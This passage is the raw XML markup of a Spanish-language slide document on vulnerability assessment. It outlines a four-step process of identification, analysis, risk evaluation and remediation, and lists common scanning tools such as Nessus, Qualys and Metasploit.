                <v:shape id="Image 414" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:83042;height:4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">
                  <v:imagedata r:id="rId193" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 415" o:spid="_x0000_s1028" style="position:absolute;left:12009;top:26822;width:59029;height:12135;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5902960,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" path="m1391285,38100r-12700,-6350l1315085,r,31750l516636,31750r,12700l1315085,44450r,31750l1378585,44450r12700,-6350xem3456178,47371r-13640,-6985l3380359,8509r-331,31762l2468880,31750r,12700l3379901,52971r12637,115l3379901,53086r-304,31623l3444456,53086r11722,-5715xem5519674,56515r-13640,-6985l5443855,17653r-330,31762l4532376,40894r,12700l5443398,62115r12636,115l5443398,62230r-305,31623l5507952,62230r11722,-5715xem5902452,632536r-3048,-12345l4829683,877049r-421005,91795l4200398,1010742r-206248,38747l3790061,1084808r-201549,31318l3389363,1143076r-196228,22377l3000121,1182573r-189611,11709l2716911,1197902r-92583,2184l2532761,1200658r-90678,-953l2263495,1193533r-175615,-11710l1916074,1165047r-169951,-21565l1579905,1117701r-164998,-29883l1252474,1054506r-160401,-36449l933323,978839,775843,937234,619633,893724,309880,802309,74752,730110r1143,-3734l84061,699744,,713803r61709,58788l71018,742276r235179,72187l616204,905929r156337,43548l930021,991133r159004,39268l1249807,1066914r162560,33363l1577086,1130109r167259,25946l1914144,1177594r172593,16879l2262632,1206207r179197,6198l2532634,1213370r91821,-584l2717292,1210602r93726,-3633l2913316,1200658r87694,-5411l3194431,1178077r196456,-22390l3590163,1128712r201930,-31356l3996436,1061999r206375,-38786l4411218,981290r421259,-91846l5902452,632536xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Evalúa si el sistema es susceptible a cualquier vulnerabilidad conocida, asigna niveles de gravedad a esas vulnerabilidades y recomienda correcciones o mitigaciones, cuando sea necesario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5D5EAD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="387"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6805C25A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1223"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1223" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Sigue un proceso de 4 pasos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFDD6AE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08219ED7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="102"/>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67712" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39F44834" wp14:editId="6B82C888">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2107692</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>241784</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1772920" cy="307975"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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307975"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1FA0ECD6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="59"/>
                              <w:ind w:left="309"/>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Identificación de Vuln</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="39F44834" id="Textbox 416" o:spid="_x0000_s1212" type="#_x0000_t202" style="position:absolute;margin-left:165.95pt;margin-top:19.05pt;width:139.6pt;height:24.25pt;z-index:-15648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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1FA0ECD6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="59"/>
                        <w:ind w:left="309"/>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Identificación de Vuln</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68224" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1353FADA" wp14:editId="17CB30F9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4411979</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>241784</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1515110" cy="307975"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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307975"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5B2B64F9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="59"/>
                              <w:ind w:left="705"/>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Análisis</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1353FADA" id="Textbox 417" o:spid="_x0000_s1213" type="#_x0000_t202" style="position:absolute;margin-left:347.4pt;margin-top:19.05pt;width:119.3pt;height:24.25pt;z-index:-1564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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5B2B64F9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="59"/>
                        <w:ind w:left="705"/>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Análisis</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68736" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="692287A3" wp14:editId="6CBA677B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>6458711</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>241784</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1515110" cy="307975"/>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307975"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="2CC2C99F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="59"/>
                              <w:ind w:left="225"/>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Evaluación de riesgos</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="692287A3" id="Textbox 418" o:spid="_x0000_s1214" type="#_x0000_t202" style="position:absolute;margin-left:508.55pt;margin-top:19.05pt;width:119.3pt;height:24.25pt;z-index:-15647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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="2CC2C99F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="59"/>
                        <w:ind w:left="225"/>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Evaluación de riesgos</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69248" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4620CFC5" wp14:editId="73CF9C98">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>8570976</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>241784</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1513840" cy="307975"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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307975"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="51F860F2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="59"/>
                              <w:ind w:left="438"/>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Remediación</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="4620CFC5" id="Textbox 419" o:spid="_x0000_s1215" type="#_x0000_t202" style="position:absolute;margin-left:674.9pt;margin-top:19.05pt;width:119.2pt;height:24.25pt;z-index:-15647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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="51F860F2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="59"/>
                        <w:ind w:left="438"/>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Remediación</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD7587A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C6A06E7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A97A9CE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="375A0E2A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14DE424B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DA1F357" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39011E02" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AE8FE8D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="577A6088" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD61E3F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:ind w:left="16736" w:right="832"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="888888"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>106</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D530C64" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="46"/>
        <w:ind w:right="415"/>
        <w:jc w:val="center"/>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p>
    <w:p w14:paraId="460EFFF7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId194"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="240" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="487E83F1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1292"/>
        </w:tabs>
        <w:spacing w:before="153"/>
        <w:ind w:left="1292" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Existe una gran cantidad de herramientas en el mercado para el proceso de Evaluación de Vulnerabilidades:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38988CE4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="176"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F61E696" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2012"/>
        </w:tabs>
        <w:ind w:left="2012" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D7E793" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2012"/>
        </w:tabs>
        <w:spacing w:before="45"/>
        <w:ind w:left="2012" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6ADBDF7F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2012"/>
        </w:tabs>
        <w:spacing w:before="42"/>
        <w:ind w:left="2012" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Gestión de vulnerabilidades de Qualys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1019F6F6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2012"/>
        </w:tabs>
        <w:spacing w:before="45"/>
        <w:ind w:left="2012" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Netsparker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F23FD87" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2012"/>
        </w:tabs>
        <w:spacing w:before="44"/>
        <w:ind w:left="2012" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C20CCB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2012"/>
        </w:tabs>
        <w:spacing w:before="43"/>
        <w:ind w:left="2012" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Amazon Inspector (SOLO para aplicaciones implementadas en AWS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59719F09" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76EF0D8F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="287"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BE8195D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1293"/>
        </w:tabs>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1293" w:right="1282" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
